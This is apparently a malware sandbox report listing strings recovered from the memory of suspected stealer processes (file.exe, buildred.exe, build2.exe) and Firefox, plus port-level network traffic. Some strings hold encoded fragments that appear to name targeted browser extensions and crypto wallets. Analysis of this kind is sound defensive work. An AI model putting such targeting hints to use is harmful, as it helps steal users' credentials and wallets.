Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000028.00000002.2879465068.0000026181EDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.0000026190794000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.comcreateContentPrincipalFromOriginremoveTabsProgressListenerchrome://bro
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/resource://gre/modules/Log.sys.mjsipc:first-content-process-
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000028.00000002.2884438644.000002618E7A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F1FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F10F000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CE8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 00000028.00000002.2882551286.000002618E65C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000028.00000002.2882551286.000002618E65C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/p
Source: firefox.exe, 00000028.00000002.2855910749.000000BCB2BBC000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 00000028.00000002.2884438644.000002618E7B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/findUpdates()
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000028.00000002.2927921411.0000026194B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F10F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2881327122.0000026184210000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855549826.00000130BDB50000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2851889197.00000130BD7D0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855549826.00000130BDB54000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2851889197.00000130BD7DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account
Source: firefox.exe, 00000027.00000002.2761056031.0000025949DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account--attempting-deelevationN
Source: firefox.exe, 00000028.00000002.2881327122.00000261842A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751624555.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account6
Source: firefox.exe, 00000028.00000002.2878694022.0000026181C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountC:
Source: firefox.exe, 00000028.00000002.2878323682.0000026181BB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountH
Source: firefox.exe, 00000028.00000003.2751223783.00000261842EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842EC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2881327122.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2881327122.00000261842F2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2888379941.000002618F03A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855549826.00000130BDB50000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2851889197.00000130BD7D0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855549826.00000130BDB54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:
Source: firefox.exe, 00000021.00000003.2708137723.000001E539280000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2738774897.000001E539259000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2766541210.000001E53ADC0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2751984387.000001E539282000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2760124251.000001E539530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=alfon
Source: firefox.exe, 00000021.00000002.2738774897.000001E539259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountj
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountt-
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountwebCOOP
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountwebIsolated=https://youtube.comwebIsolated=https://youtube.comfeature
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountx
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2946351533.000015A18C600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000028.00000002.2946351533.000015A18C600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.comZ
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.comdocument-element-inserted
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.comdocument-element-insertedwebIsolated=https://youtube.comdocument-element-inserted

Source: unknown	Network traffic detected: HTTP traffic on port 61247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61190
Source: unknown	Network traffic detected: HTTP traffic on port 61459 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61193
Source: unknown	Network traffic detected: HTTP traffic on port 61488 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56345 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61451 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61348
Source: unknown	Network traffic detected: HTTP traffic on port 61391 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61349
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61229
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61460
Source: unknown	Network traffic detected: HTTP traffic on port 61218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61463
Source: unknown	Network traffic detected: HTTP traffic on port 61256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61343
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61223
Source: unknown	Network traffic detected: HTTP traffic on port 61271 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61330 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55876
Source: unknown	Network traffic detected: HTTP traffic on port 61242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55993
Source: unknown	Network traffic detected: HTTP traffic on port 61416 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55875
Source: unknown	Network traffic detected: HTTP traffic on port 61402 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56210
Source: unknown	Network traffic detected: HTTP traffic on port 61236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61448 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61350
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61230
Source: unknown	Network traffic detected: HTTP traffic on port 55791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61231
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61199
Source: unknown	Network traffic detected: HTTP traffic on port 61253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61299 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61357
Source: unknown	Network traffic detected: HTTP traffic on port 61249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61524 -> 443
